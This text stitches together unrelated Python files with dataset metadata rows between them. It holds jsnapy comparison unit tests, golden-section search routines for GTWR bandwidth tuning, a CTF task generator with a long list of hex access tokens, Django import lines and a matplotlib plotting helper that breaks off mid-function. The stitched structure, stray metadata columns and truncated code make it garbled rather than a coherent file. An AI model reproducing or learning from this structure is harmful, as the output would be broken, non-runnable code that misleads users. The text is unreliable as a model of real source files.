def test_delta_ignore_null_skip(self, mock_path):
self.chk = True
comp = Comparator()
conf_file = os.path.join(os.path.dirname(__file__),
'configs', 'main_delta_ignore-null_skip.yml')
mock_path.return_value = os.path.join(os.path.dirname(__file__), 'configs')
config_file = open(conf_file, 'r')
main_file = yaml.load(config_file, Loader=yaml.FullLoader)
oper = comp.generate_test_files(
main_file,
self.hostname,
self.chk,
self.diff,
self.db,
self.snap_del,
"snap_delta_pre",
self.action,
"snap_delta_post")
self.assertEqual(oper.no_passed, 0)
self.assertEqual(oper.no_failed, 0)
@patch('jnpr.jsnapy.check.get_path')
def test_delta_ignore_null_skip_1(self, mock_path):
self.chk = True
comp = Comparator()
conf_file = os.path.join(os.path.dirname(__file__),
'configs', 'main_delta_ignore-null_skip_1.yml')
mock_path.return_value = os.path.join(os.path.dirname(__file__), 'configs')
config_file = open(conf_file, 'r')
main_file = yaml.load(config_file, Loader=yaml.FullLoader)
oper = comp.generate_test_files(
main_file,
self.hostname,
self.chk,
self.diff,
self.db,
self.snap_del,
"snap_delta_pre",
self.action,
"snap_delta_post")
self.assertEqual(oper.no_passed, 0)
self.assertEqual(oper.no_failed, 0)
@patch('jnpr.jsnapy.check.get_path')
def test_delta_ignore_null_id_skip(self, mock_path):
self.chk = True
comp = Comparator()
conf_file = os.path.join(os.path.dirname(__file__),
'configs', 'main_delta_ignore-null_id_skip.yml')
mock_path.return_value = os.path.join(os.path.dirname(__file__), 'configs')
config_file = open(conf_file, 'r')
main_file = yaml.load(config_file, Loader=yaml.FullLoader)
oper = comp.generate_test_files(
main_file,
self.hostname,
self.chk,
self.diff,
self.db,
self.snap_del,
"snap_delta_pre",
self.action,
"snap_delta_post")
self.assertEqual(oper.no_passed, 0)
self.assertEqual(oper.no_failed, 0)
@patch('jnpr.jsnapy.check.get_path')
def test_delta_fail(self, mock_path):
self.chk = True
comp = Comparator()
conf_file = os.path.join(os.path.dirname(__file__),
'configs', 'main_delta.yml')
mock_path.return_value = os.path.join(os.path.dirname(__file__), 'configs')
config_file = open(conf_file, 'r')
main_file = yaml.load(config_file, Loader=yaml.FullLoader)
oper = comp.generate_test_files(
main_file,
self.hostname,
self.chk,
self.diff,
self.db,
self.snap_del,
"snap_delta_fail_pre",
self.action,
"snap_delta_fail_post")
self.assertEqual(oper.no_passed, 0)
self.assertEqual(oper.no_failed, 1)
@patch('jnpr.jsnapy.check.get_path')
def test_no_diff(self, mock_path):
self.chk = True
comp = Comparator()
conf_file = os.path.join(os.path.dirname(__file__),
'configs', 'main_no-diff.yml')
mock_path.return_value = os.path.join(os.path.dirname(__file__), 'configs')
config_file = open(conf_file, 'r')
main_file = yaml.load(config_file, Loader=yaml.FullLoader)
oper = comp.generate_test_files(
main_file,
self.hostname,
self.chk,
self.diff,
self.db,
self.snap_del,
"snap_no-diff_pre",
self.action,
"snap_no-diff_post")
self.assertEqual(oper.no_passed, 2)
self.assertEqual(oper.no_failed, 4)
@patch('jnpr.jsnapy.check.get_path')
def test_no_diff_2(self, mock_path):
self.chk = True
comp = Comparator()
conf_file = os.path.join(os.path.dirname(__file__),
'configs', 'main_dot-dot.yml')
mock_path.return_value = os.path.join(os.path.dirname(__file__), 'configs')
config_file = open(conf_file, 'r')
main_file = yaml.load(config_file, Loader=yaml.FullLoader)
oper = comp.generate_test_files(
main_file,
self.hostname,
self.chk,
self.diff,
self.db,
self.snap_del,
"snap_no-diff_pre",
self.action,
"snap_no-diff_post")
self.assertEqual(oper.no_passed, 0)
self.assertEqual(oper.no_failed, 6)
@patch('jnpr.jsnapy.check.get_path')
@patch('jnpr.jsnapy.sqlite_get.get_path')
def test_no_diff_2_pass(self, mock_sqlite_path, mock_path):
self.chk = True
comp = Comparator()
conf_file = os.path.join(os.path.dirname(__file__),
'configs', 'main_dot-dot.yml')
mock_path.return_value = os.path.join(os.path.dirname(__file__), 'configs')
mock_sqlite_path.return_value = os.path.join(os.path.dirname(__file__), 'configs')
config_file = open(conf_file, 'r')
main_file = yaml.load(config_file, Loader=yaml.FullLoader)
oper = comp.generate_test_files(
main_file,
self.hostname,
self.chk,
self.diff,
self.db,
self.snap_del,
"snap_no-diff_pre",
self.action,
"snap_3")
self.assertEqual(oper.no_passed, 6)
self.assertEqual(oper.no_failed, 0)
@patch('jnpr.jsnapy.check.get_path')
@patch('jnpr.jsnapy.sqlite_get.get_path')
def test_no_diff_pass(self, sqlite_mock_path, mock_path):
self.hostname = '10.216.193.114'
self.chk = True
self.db['check_from_sqlite'] = True
comp = Comparator()
conf_file = os.path.join(os.path.dirname(__file__),
'configs', 'main_no-diff_sql.yml')
mock_path.return_value = os.path.join(os.path.dirname(__file__), 'configs')
sqlite_mock_path.return_value = os.path.join(os.path.dirname(__file__), 'configs')
config_file = open(conf_file, 'r')
main_file = yaml.load(config_file, Loader=yaml.FullLoader)
oper = comp.generate_test_files(
main_file,
self.hostname,
self.chk,
self.diff,
self.db,
self.snap_del,
"snap_no-diff_pre",
self.action,
"snap_no-diff_post1")
self.assertEqual(oper.no_passed, 6)
self.assertEqual(oper.no_failed, 0)
@patch('jnpr.jsnapy.check.get_path')
def test_no_diff_ignore_null_id_skip(self, mock_path):
self.chk = True
comp = Comparator()
conf_file = os.path.join(os.path.dirname(__file__),
'configs', 'main_no-diff_ignore-null_id_skip.yml')
mock_path.return_value = os.path.join(os.path.dirname(__file__), 'configs')
config_file = open(conf_file, 'r')
main_file = yaml.load(config_file, Loader=yaml.FullLoader)
oper = comp.generate_test_files(
main_file,
self.hostname,
self.chk,
self.diff,
self.db,
self.snap_del,
"snap_no-diff_pre",
self.action,
"snap_no-diff_post")
self.assertEqual(oper.no_passed, 0)
self.assertEqual(oper.no_failed, 0)
with patch('logging.Logger') as mock_logger:
if __name__ == "__main__":
suite = unittest.TestLoader().loadTestsFromTestCase(
TestComparisonOperator)
unittest.TextTestRunner(verbosity=2).run(suite)
| 38.817915
| 120
| 0.581199
| 3,302
| 26,435
| 4.335554
| 0.039976
| 0.050293
| 0.041911
| 0.050293
| 0.947332
| 0.941883
| 0.941883
| 0.93853
| 0.93853
| 0.93853
| 0
| 0.00564
| 0.309173
| 26,435
| 680
| 121
| 38.875
| 0.778283
| 0.027539
| 0
| 0.873239
| 0
| 0
| 0.122782
| 0.063395
| 0
| 0
| 0
| 0
| 0.090767
| 1
| 0.046948
| false
| 0.051643
| 0.00939
| 0
| 0.057903
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
91eee022be27deb4cceec57063bd54294c818894
| 6,344
|
py
|
Python
|
python GTWR/gtwr-1.0.1/gtwr/search.py
|
RobinYaoWenbin/python-
|
9607219b8d057ab896ecae5326daadd7dcfb6112
|
[
"MIT"
] | 12
|
2020-09-28T03:25:03.000Z
|
2022-03-20T07:44:09.000Z
|
python GTWR/gtwr-1.0.1/gtwr/search.py
|
RobinYaoWenbin/python-
|
9607219b8d057ab896ecae5326daadd7dcfb6112
|
[
"MIT"
] | null | null | null |
python GTWR/gtwr-1.0.1/gtwr/search.py
|
RobinYaoWenbin/python-
|
9607219b8d057ab896ecae5326daadd7dcfb6112
|
[
"MIT"
] | 21
|
2020-03-19T00:44:35.000Z
|
2022-01-30T03:46:18.000Z
|
import numpy as np
def golden_section(a, c, delta, decimal, function, tol, max_iter, verbose=False):
b = a + delta * np.abs(c - a)
d = c - delta * np.abs(c - a)
diff = 1.0e9
iters = 0
dict = {}
while np.abs(diff) > tol and iters < max_iter:
iters += 1
b = np.round(b, decimal)
d = np.round(d, decimal)
if b in dict:
score_b = dict[b]
else:
score_b = function(b)
dict[b] = score_b
if d in dict:
score_d = dict[d]
else:
score_d = function(d)
dict[d] = score_d
if score_b <= score_d:
opt_val = b
opt_score = score_b
c = d
d = b
b = a + delta * np.abs(c - a)
else:
opt_val = d
opt_score = score_d
a = b
b = d
d = c - delta * np.abs(c - a)
opt_val = np.round(opt_val, decimal)
diff = score_b - score_d
if verbose:
print('bw:', opt_val, ', score:', np.round(opt_score,2))
return opt_val
def onestep_golden_section(A, C, x, delta, taudecimal, function, tol, mpi=False):
iters = 0
dict = {}
diff = 1e9
opt_score = None
opt_tau = None
B = A + delta * np.abs(C - A)
D = C - delta * np.abs(C - A)
while np.abs(diff) > tol and iters < 200:
iters += 1
B = np.round(B, taudecimal)
D = np.round(D, taudecimal)
if B in dict:
score_B = dict[B]
else:
score_B = function(x, B)
dict[B] = score_B
if D in dict:
score_D = dict[D]
else:
score_D = function(x, D)
dict[D] = score_D
if mpi:
from mpi4py import MPI
comm = MPI.COMM_WORLD
rank = comm.Get_rank()
if rank == 0:
if score_B <= score_D:
opt_score = score_B
opt_tau = B
C = D
D = B
B = A + delta * np.abs(C - A)
else:
opt_score = score_D
opt_tau = D
A = B
B = D
D = C - delta * np.abs(C - A)
diff = score_B - score_D
opt_tau = np.round(opt_tau, taudecimal)
B = comm.bcast(B, root=0)
D = comm.bcast(D, root=0)
diff = comm.bcast(diff, root=0)
opt_score = comm.bcast(opt_score, root=0)
opt_tau = comm.bcast(opt_tau, root=0)
else:
if score_B <= score_D:
opt_score = score_B
opt_tau = B
C = D
D = B
B = A + delta * np.abs(C - A)
else:
opt_score = score_D
opt_tau = D
A = B
B = D
D = C - delta * np.abs(C - A)
diff = score_B - score_D
return opt_tau, opt_score
def twostep_golden_section(a, c, A, C, delta, function,
tol, max_iter, bwdecimal, taudecimal, verbose = False, mpi = False):
b = a + delta * np.abs(c - a)
d = c - delta * np.abs(c - a)
opt_score = None
opt_bw = None
opt_tau = None
diff = 1e9
dict = {}
iters = 0
while np.abs(diff) > tol and iters < 200:
iters += 1
b = np.round(b, bwdecimal)
d = np.round(d, bwdecimal)
if b in dict:
score_b = dict[b]
else:
if mpi:
tau_b, score_b = onestep_golden_section(A, C, b, delta, taudecimal, function,
tol, mpi=True)
else:
tau_b, score_b = onestep_golden_section(A, C, b, delta, taudecimal, function,
tol)
dict[b] = score_b
if d in dict:
score_d = dict[d]
else:
if mpi:
tau_d, score_d = onestep_golden_section(A, C, d, delta, taudecimal, function,
tol, mpi=True)
else:
tau_d, score_d = onestep_golden_section(A, C, d, delta, taudecimal, function,
tol)
dict[d] = score_d
if mpi:
from mpi4py import MPI
comm = MPI.COMM_WORLD
rank = comm.Get_rank()
if rank == 0:
if score_b <= score_d:
opt_score = score_b
opt_bw = b
opt_tau = tau_b
c = d
d = b
b = a + delta * np.abs(c - a)
else:
opt_score = score_d
opt_bw = d
opt_tau = tau_d
a = b
b = d
d = c - delta * np.abs(c - a)
diff = score_b - score_d
opt_tau = np.round(opt_tau, taudecimal)
opt_bw = np.round(opt_bw, bwdecimal)
if verbose:
print('bw: ', opt_bw, ', tau: ', opt_tau, ', score: ', opt_score)
b = comm.bcast(b, root=0)
d = comm.bcast(d, root=0)
diff = comm.bcast(diff, root=0)
opt_bw = comm.bcast(opt_bw, root=0)
opt_tau = comm.bcast(opt_tau, root=0)
else:
if score_b <= score_d:
opt_score = score_b
opt_bw = b
opt_tau = tau_b
c = d
d = b
b = a + delta * np.abs(c - a)
else:
opt_score = score_d
opt_bw = d
opt_tau = tau_d
a = b
b = d
d = c - delta * np.abs(c - a)
diff = score_b - score_d
if verbose:
print('bw: ', opt_bw, ', tau: ', opt_tau, ', score: ', opt_score)
return opt_bw, opt_tau
| 32.533333
| 95
| 0.39896
| 777
| 6,344
| 3.082368
| 0.074646
| 0.065136
| 0.066806
| 0.073486
| 0.769102
| 0.747808
| 0.729019
| 0.71858
| 0.705219
| 0.695198
| 0
| 0.010971
| 0.511507
| 6,344
| 194
| 96
| 32.701031
| 0.761859
| 0
| 0
| 0.790055
| 0
| 0
| 0.008293
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.016575
| false
| 0
| 0.016575
| 0
| 0.049724
| 0.016575
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
37e231b093493c4fcf3a8273742eca4ee8550871
| 7,534
|
py
|
Python
|
tasks-deploy/terminal/generate.py
|
irdkwmnsb/lkshl-ctf
|
e5c0200ddc8ba73df5f321b87b9763fb1bbaba57
|
[
"MIT"
] | 3
|
2021-03-30T06:27:58.000Z
|
2021-04-03T17:56:35.000Z
|
tasks-deploy/terminal/generate.py
|
irdkwmnsb/lkshl-ctf
|
e5c0200ddc8ba73df5f321b87b9763fb1bbaba57
|
[
"MIT"
] | null | null | null |
tasks-deploy/terminal/generate.py
|
irdkwmnsb/lkshl-ctf
|
e5c0200ddc8ba73df5f321b87b9763fb1bbaba57
|
[
"MIT"
] | null | null | null |
TITLE = "Some Quick Luck"
STATEMENT_TEMPLATE = '''
[terminal.ctf.sicamp.ru:8080/{0}](http://terminal.ctf.sicamp.ru:8080/{0}/)
'''
def generate(context):
participant = context['participant']
token = tokens[participant.id % len(tokens)]
return TaskStatement(TITLE, STATEMENT_TEMPLATE.format(token))
tokens = ['baffdd47720d5684fefb2aa6b3cf1326', 'a0327b5205a9ad077381ec912484ce38', 'f8021544877c601b4543adb2af5f7632', '5071a20f8dd3313e8a173ac310b81cc2', '9e99cd5bddf71f86c31eb384fc9415d1', 'c2fe1c7aa456af6647de3b395c3ad0c6', 'be5428d0435d64dacc560d8418de2fc3', '4a6291ae8871efb68579ac3278ff2f19', '8d42865c75a7fc5e074221366f100016', '428ab21b6382a8ac55a027313f88a68a', 'bcdfe9abc540282b02b5b88278b170ca', '996e2a36402e82eccf8ceb25580445c7', 'e1a6a9dae9bf5317d820341d87e5dd64', 'ff7d2289281443f98ac516453618feb3', 'faa604f41c51f8728ba84509e90ad06a', '2c55d85df4abe0b0ad61120f1323400c', '69038113187c6a8cdc07a723fbd1c3ff', 'e1d2a2de11d9f8e8dba175ddc798d273', '7903ae5a157eea5c13cf65a366968499', '3e6d9a53d043c701df1027e033a04aa0', 'e39485ed9d72fad851688647989066ee', '273c157d1d5db1382a5282396f576a27', '446c30d4eab3971a03e3c57128a98984', '3295132b5626030dda11f9c0f85cc5e6', '92057c40fd462c433ce46c215bb09ffc', 'ece59bba53735657d32196840db03472', '5f5a1c7cf2839f016e4d91e406173c1b', 'b773c42700a60e0fb718ac58ef72c685', 'c8ef859be7ee5c4a2524915b850ca225', 'a5c4d8593d4db8cb360ac43dc2c6b22c', '7c54cde4865a12cd8ea12380173dd9a5', '7617822ad24f2ef78fb83f9714d88e83', '9e301561c62fe30d24207f16cca28397', 'e308eda818ab76216f4d97b1387bcb38', 'b30a2cbdedd6f697641fb54ebf966967', '6a14c38ee70ce6a48a9b33fd237aee92', '2e882483ff8f43e9ba529f1ecdb5b11c', '50a620836981f4efac2a2d802168fd37', '3210fb2c56dfa567c58b1cb292b2dfd9', '31b61fe2b5cf91717d2ffd64440ce87b', 'c554e42326dac06fb6290350d49b35c1', '426b2f69dcd9c757881e3b14b95d14fb', '6da453817fa270c2c52fa5c91caf036b', '0ce77a4c688a77f73d0583a2b9c5ae58', 'a56445df1f6bcea252cd38d1cfb9df8a', 'cb19e28f12a757a04cef9b79f77e62fc', 'ad5bd1884e010ccfcad401cc2ac0bbd0', 'ecb4404a7e81e170d2947e48a0d1dac6', '64ca7417de853404e3edb7e2a0d6e3e6', 'b7047cffd9d4b57f26b3c590f9e1591e', '7f094ddf937cf7200242a3e02e515b77', '602bb515dff01ced3db02ae81e9b8f4c', 'd7a53d377700d60bfd3b186f64a33029', '0f48e475f5bfae4e0a7d46e5d870ad6b', '6c90f164a23cf772c5ba126ab641df59', '57373cd09dffff77c41b3304c8bcdeeb', 'f38f91aad8d3782ac1cd3cc936958078', '835c51dc50f279f4cbc162e4eaa50055', 'dfd7c7175aa10e4a92494a244cf62c94', '1c3629e1c5e0b65b0b729f921206d8a8', '1a4588560b336156b3ea61e6525a474f', '035aff657699eba910cf4b8e06a7e48f', '8d98e90bc9ca1b34d170643190d44060', '3a81b137461e53c686b2ed1e1d9ddf7f', 'f0164113f4c208a16bc0633b973d3a58', 'd12451de753755281ed5c9de73d6fb94', '7000622182a2414f275d659ed335afc2', 'fd88478685fd893dba1cf18343b76062', '89ff927f4f80603af6369602e403fa96', '57cc687df32c43db021483e746e8a5f4', '7a1cfde5549f34d772a6e1a1f05ab744', '72df71e7409f4726a6c710c5e8ce6cee', 'a8f22fd2c85b14f4fffad01d82f84804', '93a577464fef85b7313fffa726bc4234', '8b6b82d275b3e25f97449a6148082c68', 'e2170a0da1b3543a8413549364dd59c9', '129d9c9b48dc31bacdf8233d32de5190', '7aac34db6846453deaf7ac0274e386dc', '089a7aa265342353e39de52c1bb39a87', '3c2602d4f964a82b6b457cf2c08f82b3', '676c234d201733dd6801b9a6d615e9f2', '82a6516bb549a67f0eeb740e7ac0093e', '13b50baed6e4a915878c8a8a78fed466', 'd70901ea09b3fe83e0ede8b02b9799a5', 'ed4ede85a5f9c0fa0e985e260921c785', '276db9760f6362cacb7ce80f8486a8d2', '4919b46fc17ef6e25c9309320c2b3cb9', 'bb24fff09eb18e7ef2058e50e52f9d8f', '8b56fde1bc494d7c4dfd0a88369291a5', '15efbf802975dfa3d5ef2efed7f00dfd', 'af4735a02ed259e9e4c37ac566b92329', '3d574c2e8121a15adf48fe122be01ab2', '601a55f9206313e1a50003df2a166bef', 'dbe1d2783d0d0c2bd391ccc99d9b16ca', '5e41b8ffcd034bba01fdf6a54cb9ce09', '239b7a23fbe707fb8f3b0f9015f2b42b', 'bb6f97467771a5a2a6e23960736b8b45', '5f492792297b5f22bd02c8efda266e82', '86e77d7e1bbe7533c8869c125bc94b25', '518783e8f56cd2cb48509e57944f92a8', '7d4a026bfa0f2655a20a8dd8f687c564', 'f65e02c5af0f2bdeb09a8e67c214dd23', '9d2e0edc4271576268bc2f35278e5462', '1fc74fe4618dd136579d971a00482964', '7c00833676623d389e6b8711a20215b3', 'a236bac2dc917f8c139182da1fc15ff2', '40c0261400bee7f1f8f2fc8945a0b9a1', 'dd9ec2d59432820f3696804aeaf60db0', 'bd93a22a51016f53ec4e9ec15a804f80', 'c6c53edb8e9c264d238abda4e8894237', 'a1d9256d441aad17e78315c4fe847afb', 'c23974a3a764130b0fc01267fd622427', '0c00ca560df9dd36f60d0d53a8cd0ed2', '0b24fc1326fe110ea5c4cc0297b3693e', 'f7eca43b1947d1eabcd8d7ca1acbe252', '0b893eeec29f2f594d32d031795348f2', '7c7b6f5f76486e8ca84f35157c6923fa', '69b2926a0938cedc74a8349cc43ddac3', '5fccb30021eac64a6ffe4fce2c970d1f', 'b96f6fce7295ffb25a16e39646a14e6f', 'e7db82a9ecbdf08ebee98ad380b68985', 'f7f8e0b447f5c78304604cc26d5b4d74', 'b41c625e555c62202e9de4170bb266a0', '8fd520bd0396365307df2f6e240f9222', '1f827c1d11bcf4aa404f6d429f6684c5', 'c1dd8896cc06463f08ca3dfe936dfdac', '6b1abf22f7df58d6ae3bd0cf8ee4c220', 'f9d0fd3517b49c9ba1f5748acca92c4a', '74e9ebe63823385c4ff285a7e9ef2729', '90cf11f42214f99bacc8208a002fe0be', '719043cc38d8678acff4e8b130e22154', '26cabdeb62a35dbd26f905bd557e9519', 'ddc1de90a1741c66ade7f7d3e3b8e0c5', '1784f57f82bb4e578eff7d95cb646af0', '0a6d323e41a17562c302f0647ceb4449', '6a612c9ef2a9363e98c9b5b3428d67ee', '44a3c63c88c79de6d1de5b7d51a967c3', '6441032ed8a683f297db3bd9ad8cb913', '643dc71b6317b96fa3daf40073cce3c2', '0502d6bf30b06aef8026356ae61be062', '1ad88a90155c043f81c38144556b8a57', '807c98a1b36ce3311a9c086fba5e89a5', '4a95ca81fef2744a03c0bc05c970b127', '56adffb6143d93611f1a5f0832d5819a', '31be4cd24daaa14eac77be92db296d45', 'a5cecc426b85ad6422ab5c0d9c16837a', '8a75943815f287d8253d4eefaacd6143', '15dd9485b0d07a67fc5492ab152f2734', 'd0dfbe6f96673d708876427358534cad', 'ff9e0613f2ec9a266f3dff2bc027a858', '08b2afe636e8b1735f790788202707eb', '1c1137447ac63690a1005df042d5f04d', '46e25d599bee1f8cbb63ee7f571584fd', '95df03cbad7fe697432c19798d05342c', '00a8097e36bd0eed89977874d704e923', '958cca5f04dea514b5baa85756e05a33', 'b07c19a9208b148746c6804b97883371', '781017f382ea9092d57baf8356c2abe6', '7900e6ec79324b23f70ac4bcbd7149a7', '36b8c6784c87ecabd6f0f9c45ffe60f9', '42e9f8b332dd6581c1543f43789103dd', 'fb549c8ad2bebb1bf6456cb2a4704983', 'ac27c26722030632efe92e7d8ceb172d', '41231f617965d65472372306d1443857', 'c8cd22abb9d2bea2ac73bc268519144f', '15c9827d108094732e01e3f6b219fc74', '3ac685725abd3e6201629eb0bebf6955', '2aa6362c4b2aac0c34a55064403db6fd', '48aca1946ceede6872f622a5854325f5', '4d1f6c38893d1fd6cc645a44afb9417e', '3071ac54004077eb2421d5147455dd6d', 'fe9191e85c8c1850d11d29197d7e9ecd', 'b70dcfbfc6ddf2bb77e35f05b1c237eb', '7dc1b362312ab3f8cb043e63381aa520', '8eb2d6c4550911effebc8cda9a6916ce', 'f31ac2d8138ea91990638c9c98a87985', '7b2fbc0398627e245ac104559d7ca6d1', '28f25eb10e93297ca069a4f3d75fc3f4', '8c7bdb7ea868e886acd2cb18771dc44a', '8904d631503545a2a4a0841501789cdf', '3a976ef2ea88a03d8c09dcf9cb73eea8', 'bb773ce4165cefe54665d7465e6f8e07', '98d827daa011f8c075410b08f1c4b91a', '55563c44328d8fa5d865a71e529692fd', '78447efa695cabcbe010c729562f7020', '4dd9ddbcec3b91678fc2d7ea31f70dcd', 'c99380de7267f1aa4296d078a5bbd83a', '80d0209bd967e6e4fb8df7f0f564fee7', 'a2df8b84c080459e560f9a2b39c4d24b', '5d04d0adf7769f237d2e9141ca778aa9', '72e8201b786b515e35bb8902d705b469', '18f48fbf8f3f97a40a130e4d5c5b5c33', '6d87559bec0ea1ccd42a9f465e5bf351', 'dfd2af177b7b71e9e12b8a7e4d20ffa9', '20ba31b40c3c2ed208139b042e080060', 'a2d037fd46eeb7841384b26011cd9be2', '40839122ce97eda06c7544e108cecdc5', '1107fbc2481b53a404f9ff1029a68fe0', '53991dcfaa8ef818c003a8a261d91225', 'aca209778dce1125a9c00c93c6b95244']
| 684.909091
| 7,209
| 0.879612
| 239
| 7,534
| 27.719665
| 0.937238
| 0.005132
| 0.005132
| 0.005736
| 0.007245
| 0.007245
| 0
| 0
| 0
| 0
| 0
| 0.55287
| 0.033448
| 7,534
| 11
| 7,209
| 684.909091
| 0.356907
| 0
| 0
| 0
| 1
| 0.111111
| 0.864053
| 0.850498
| 0
| 0
| 0
| 0
| 0
| 1
| 0.111111
| false
| 0
| 0
| 0
| 0.222222
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
37fdb6e5afe9fb9ad8c7f5f474e120e4d1cd34c6
| 124
|
py
|
Python
|
downtime/tests/test_smoke.py
|
dstegelman/django-downtime
|
1be22357ab6530be24d68995b7360b1ab8c428a3
|
[
"MIT"
] | 19
|
2015-03-25T07:55:42.000Z
|
2017-08-04T01:03:48.000Z
|
downtime/tests/test_smoke.py
|
dstegelman/django-downtime
|
1be22357ab6530be24d68995b7360b1ab8c428a3
|
[
"MIT"
] | 32
|
2015-01-10T02:54:38.000Z
|
2018-02-21T03:45:30.000Z
|
downtime/tests/test_smoke.py
|
psu-oit/django-downtime
|
1be22357ab6530be24d68995b7360b1ab8c428a3
|
[
"MIT"
] | 9
|
2015-03-02T00:24:09.000Z
|
2018-11-21T17:39:17.000Z
|
from downtime.admin import *
from downtime.managers import *
from downtime.models import *
from downtime.middleware import *
| 31
| 33
| 0.814516
| 16
| 124
| 6.3125
| 0.4375
| 0.475248
| 0.534653
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.120968
| 124
| 4
| 33
| 31
| 0.926606
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
530348bea1523ebdd5f949441fcb3c4b95d7376f
| 107
|
py
|
Python
|
pgsyn/knowledge/__init__.py
|
Y1fanHE/kdps
|
c09810afb35d93018b9a7d7edb182e2f8f8a6049
|
[
"MIT"
] | null | null | null |
pgsyn/knowledge/__init__.py
|
Y1fanHE/kdps
|
c09810afb35d93018b9a7d7edb182e2f8f8a6049
|
[
"MIT"
] | null | null | null |
pgsyn/knowledge/__init__.py
|
Y1fanHE/kdps
|
c09810afb35d93018b9a7d7edb182e2f8f8a6049
|
[
"MIT"
] | null | null | null |
'''
Author: He,Yifan
Date: 2022-02-17 17:19:33
LastEditors: He,Yifan
LastEditTime: 2022-02-17 17:19:33
'''
| 15.285714
| 33
| 0.700935
| 20
| 107
| 3.75
| 0.55
| 0.186667
| 0.213333
| 0.266667
| 0.373333
| 0.373333
| 0
| 0
| 0
| 0
| 0
| 0.294737
| 0.11215
| 107
| 6
| 34
| 17.833333
| 0.494737
| 0.915888
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
530829a8730fe857d3775a366a93a63aa6596cff
| 21,897
|
py
|
Python
|
v0/aia_eis_v0/utils/visualize_utils/shareX_2Y_plots.py
|
DreamBoatOve/aia_eis
|
458b4d29846669b10db4da1b3e86c0b394614ceb
|
[
"MIT"
] | 1
|
2022-03-02T12:57:19.000Z
|
2022-03-02T12:57:19.000Z
|
v0/aia_eis_v0/utils/visualize_utils/shareX_2Y_plots.py
|
DreamBoatOve/aia_eis
|
458b4d29846669b10db4da1b3e86c0b394614ceb
|
[
"MIT"
] | null | null | null |
v0/aia_eis_v0/utils/visualize_utils/shareX_2Y_plots.py
|
DreamBoatOve/aia_eis
|
458b4d29846669b10db4da1b3e86c0b394614ceb
|
[
"MIT"
] | null | null | null |
import matplotlib.pyplot as plt
import numpy as np
"""
Module Function
两张图共享一个X轴,不同的Y轴在一侧
Refer:
Creating adjacent subplots
https://matplotlib.org/gallery/subplots_axes_and_figures/ganged_plots.html#sphx-glr-gallery-subplots-axes-and-figures-ganged-plots-py
"""
def tutorial_plot():
t = np.arange(0.0, 2.0, 0.01)
s1 = np.sin(2 * np.pi * t)
s2 = np.exp(-t)
s3 = s1 * s2
fig, axs = plt.subplots(3, 1, sharex=True)
# Remove horizontal space between axes
fig.subplots_adjust(hspace=0)
# Plot each graph, and manually set the y tick values
axs[0].plot(t, s1)
axs[0].set_yticks(np.arange(-0.9, 1.0, 0.4))
axs[0].set_ylim(-1, 1)
axs[1].plot(t, s2)
axs[1].set_yticks(np.arange(0.1, 1.0, 0.2))
axs[1].set_ylim(0, 1)
axs[2].plot(t, s3)
axs[2].set_yticks(np.arange(-0.9, 1.0, 0.4))
axs[2].set_ylim(-1, 1)
plt.show()
# tutorial_plot()
def my_shareX_2Y_plot_4_AB_0(x_arr, y1_arr, y2_arr):
"""
Function
用于AB 结果的绘图
:param
w_type: str
'w', raw/original weight
'abs', the Abs(w)
'positive', only keep the weight with positive value
:return:
"""
# 计算高中低三个区Avg的Avg
avg_avg_high = np.mean(y1_arr[:int(y1_arr.shape[0] / 3)])
avg_avg_mid = np.mean(y1_arr[int(y1_arr.shape[0] / 3) : int(2 * y1_arr.shape[0] / 3)])
avg_avg_low = np.mean(y1_arr[int(2 * y1_arr.shape[0] / 3) : ])
# 计算高中低三个区Avg的Var
avg_var_high = np.mean(y2_arr[:int(y2_arr.shape[0] / 3)])
avg_var_mid = np.mean(y2_arr[int(y2_arr.shape[0] / 3) : int(2 * y2_arr.shape[0] / 3)])
avg_var_low = np.mean(y2_arr[int(2 * y2_arr.shape[0] / 3) : ])
# 3d surface plot的长宽比大概是4:3,此处放大3倍,12:9
fig, axs = plt.subplots(2, 1, figsize=(12, 9), sharex=True)
# 设置横纵坐标轴上的刻度字体大小
# plt.tick_params(labelsize=30)
# Remove horizontal space between axes
fig.subplots_adjust(hspace=0)
# 设置横纵坐标的[名称/标题]以及对应字体格式
x_y_title_font_setting = {'family': 'Times New Roman',
'weight': 'normal',
'size': 18}
# Plot each graph, and manually set the y tick values
axs[0].plot(x_arr, y1_arr)
y1_min, y1_max = np.min(y1_arr), np.max(y1_arr)
# 这样设置太贴近上下边界,而且y轴数值有小数点后四位(太多,两位即可)
